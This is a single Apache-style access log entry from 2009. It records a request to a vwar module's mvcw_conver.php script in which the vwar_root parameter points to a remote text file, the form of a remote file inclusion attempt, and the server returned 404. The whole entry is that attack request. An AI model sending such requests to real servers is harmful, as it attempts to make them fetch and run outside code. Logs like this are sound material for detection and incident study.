74.200.195.130 - - [22/Jun/2009:03:33:28 -0400] "GET /logs/access_log.Q109060200%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
